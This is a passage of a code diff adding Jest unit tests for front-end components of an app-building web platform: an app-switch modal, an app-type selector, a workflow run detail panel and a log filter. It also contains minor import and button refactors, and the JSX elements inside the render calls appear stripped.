    , +})) + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'app-123', + name: 'Demo App', + description: 'Demo description', + author_name: 'Demo author', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: AppModeEnum.COMPLETION, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const renderComponent = (overrides: Partial> = {}) => { + const notify = jest.fn() + const onClose = jest.fn() + const onSuccess = jest.fn() + const appDetail = createMockApp() + + const utils = render( + + + , + ) + + return { + ...utils, + notify, + onClose, + onSuccess, + appDetail, + } +} + +describe('SwitchAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockIsEditor = true + mockEnableBilling = false + mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + } + }) + + // Rendering behavior for modal visibility and default values. 
+ describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.switch')).toBeInTheDocument() + expect(screen.getByDisplayValue('Demo App(copy)')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.switch')).not.toBeInTheDocument() + }) + }) + + // Prop-driven UI states such as disabling actions. + describe('Props', () => { + it('should disable the start button when name is empty', async () => { + const user = userEvent.setup() + // Arrange + renderComponent() + + // Act + const nameInput = screen.getByDisplayValue('Demo App(copy)') + await user.clear(nameInput) + + // Assert + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + + it('should render the apps full warning when plan limits are reached', () => { + // Arrange + mockEnableBilling = true + mockPlan = { + ...mockPlan, + usage: { ...mockPlan.usage, buildApps: 10 }, + total: { ...mockPlan.total, buildApps: 10 }, + } + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + }) + + // User interactions that trigger navigation and API calls. 
+ describe('Interactions', () => { + it('should call onClose when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onClose } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'app.newApp.Cancel' })) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should switch app and navigate with push when keeping original', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail, notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-001' }) + const setItemSpy = jest.spyOn(Storage.prototype, 'setItem') + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockSwitchApp).toHaveBeenCalledWith({ + appID: appDetail.id, + name: 'Demo App(copy)', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + }) + expect(onSuccess).toHaveBeenCalledTimes(1) + expect(onClose).toHaveBeenCalledTimes(1) + expect(notify).toHaveBeenCalledWith({ type: 'success', message: 'app.newApp.appCreated' }) + expect(setItemSpy).toHaveBeenCalledWith(NEED_REFRESH_APP_LIST_KEY, '1') + expect(mockPush).toHaveBeenCalledWith('/app/new-app-001/workflow') + expect(mockReplace).not.toHaveBeenCalled() + }) + + it('should delete the original app and use replace when remove original is confirmed', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail } = renderComponent({ inAppDetail: true }) + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-002' }) + + // Act + await user.click(screen.getByText('app.removeOriginal')) + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockDeleteApp).toHaveBeenCalledWith(appDetail.id) + 
}) + expect(mockReplace).toHaveBeenCalledWith('/app/new-app-002/workflow') + expect(mockPush).not.toHaveBeenCalled() + expect(mockSetAppDetail).toHaveBeenCalledTimes(1) + }) + + it('should notify error when switch app fails', async () => { + const user = userEvent.setup() + // Arrange + const { notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockRejectedValueOnce(new Error('fail')) + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(notify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + expect(onClose).not.toHaveBeenCalled() + expect(onSuccess).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/switch-app-modal/index.tsx b/web/app/components/app/switch-app-modal/index.tsx index a7e1cea429..742212a44d 100644 --- a/web/app/components/app/switch-app-modal/index.tsx +++ b/web/app/components/app/switch-app-modal/index.tsx @@ -6,7 +6,7 @@ import { useContext } from 'use-context-selector' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/text-generate/item/index.tsx b/web/app/components/app/text-generate/item/index.tsx index 4d0a17d790..1e61ff18c7 100644 --- a/web/app/components/app/text-generate/item/index.tsx +++ b/web/app/components/app/text-generate/item/index.tsx @@ -14,7 +14,7 @@ import { useStore as useAppStore } from '@/app/components/app/store' import type { WorkflowProcess } from '@/app/components/base/chat/types' import type { SiteInfo } from '@/models/share' import { useChatContext } from '@/app/components/base/chat/chat/context' -import cn from 
'@/utils/classnames' +import { cn } from '@/utils/classnames' import ContentSection from './content-section' import MetaSection from './meta-section' import { useMoreLikeThisState, useWorkflowTabs } from './hooks' diff --git a/web/app/components/app/text-generate/saved-items/index.tsx b/web/app/components/app/text-generate/saved-items/index.tsx index c22a4ca6c2..e6cf264cf2 100644 --- a/web/app/components/app/text-generate/saved-items/index.tsx +++ b/web/app/components/app/text-generate/saved-items/index.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import copy from 'copy-to-clipboard' import NoData from './no-data' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { SavedMessage } from '@/models/debug' import { Markdown } from '@/app/components/base/markdown' import Toast from '@/app/components/base/toast' diff --git a/web/app/components/app/type-selector/index.spec.tsx b/web/app/components/app/type-selector/index.spec.tsx new file mode 100644 index 0000000000..346c9d5716 --- /dev/null +++ b/web/app/components/app/type-selector/index.spec.tsx @@ -0,0 +1,144 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import AppTypeSelector, { AppTypeIcon, AppTypeLabel } from './index' +import { AppModeEnum } from '@/types/app' + +jest.mock('react-i18next') + +describe('AppTypeSelector', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers default rendering and the closed dropdown state. + describe('Rendering', () => { + it('should render "all types" trigger when no types selected', () => { + render() + + expect(screen.getByText('app.typeSelector.all')).toBeInTheDocument() + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) + + // Covers prop-driven trigger variants (empty, single, multiple). 
+ describe('Props', () => { + it('should render selected type label and clear button when a single type is selected', () => { + render() + + expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + + it('should render icon-only trigger when multiple types are selected', () => { + render() + + expect(screen.queryByText('app.typeSelector.all')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.chatbot')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.workflow')).not.toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + }) + + // Covers opening/closing the dropdown and selection updates. + describe('User interactions', () => { + it('should toggle option list when clicking the trigger', () => { + render() + + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.getByRole('tooltip')).toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + + it('should call onChange with added type when selecting an unselected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.WORKFLOW]) + }) + + it('should call onChange with removed type when selecting an already-selected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.workflow')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([]) + }) + + it('should call onChange with 
appended type when selecting an additional item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.chatbot')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.agent')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.CHAT, AppModeEnum.AGENT_CHAT]) + }) + + it('should clear selection without opening the dropdown when clicking clear button', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.clear' })) + + expect(onChange).toHaveBeenCalledWith([]) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) +}) + +describe('AppTypeLabel', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers label mapping for each supported app type. + it.each([ + [AppModeEnum.CHAT, 'app.typeSelector.chatbot'], + [AppModeEnum.AGENT_CHAT, 'app.typeSelector.agent'], + [AppModeEnum.COMPLETION, 'app.typeSelector.completion'], + [AppModeEnum.ADVANCED_CHAT, 'app.typeSelector.advanced'], + [AppModeEnum.WORKFLOW, 'app.typeSelector.workflow'], + ] as const)('should render label %s for type %s', (_type, expectedLabel) => { + render() + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render empty label for unknown type', () => { + const { container } = render() + expect(container.textContent).toBe('') + }) +}) + +describe('AppTypeIcon', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers icon rendering for each supported app type. + it.each([ + [AppModeEnum.CHAT], + [AppModeEnum.AGENT_CHAT], + [AppModeEnum.COMPLETION], + [AppModeEnum.ADVANCED_CHAT], + [AppModeEnum.WORKFLOW], + ] as const)('should render icon for type %s', (type) => { + const { container } = render() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. 
+ it('should render nothing for unknown type', () => { + const { container } = render() + expect(container.firstChild).toBeNull() + }) +}) diff --git a/web/app/components/app/type-selector/index.tsx b/web/app/components/app/type-selector/index.tsx index 0f6f050953..f213a89a94 100644 --- a/web/app/components/app/type-selector/index.tsx +++ b/web/app/components/app/type-selector/index.tsx @@ -2,7 +2,7 @@ import { useTranslation } from 'react-i18next' import React, { useState } from 'react' import { RiArrowDownSLine, RiCloseCircleFill, RiExchange2Fill, RiFilter3Line } from '@remixicon/react' import Checkbox from '../../base/checkbox' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, @@ -20,6 +20,7 @@ const allTypes: AppModeEnum[] = [AppModeEnum.WORKFLOW, AppModeEnum.ADVANCED_CHAT const AppTypeSelector = ({ value, onChange }: AppSelectorProps) => { const [open, setOpen] = useState(false) + const { t } = useTranslation() return ( { 'flex cursor-pointer items-center justify-between space-x-1 rounded-md px-2 hover:bg-state-base-hover', )}> - {value && value.length > 0 &&
    { - e.stopPropagation() - onChange([]) - }}> - -
    } + {value && value.length > 0 && ( + + )}
    diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should 
render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- 
+ describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + 
it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 
'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..04216e5cc8 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,537 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { useState } from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// 
============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should 
display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) 
+ + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + 
const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const Wrapper = () => { + const [queryParams, updateQueryParams] = useState(createDefaultQueryParams()) + const handleSetQueryParams = (next: QueryParam) => { + updateQueryParams(next) + setQueryParams(next) + } + return ( + + ) + } + + render() + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) 
+ + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + 
describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + 
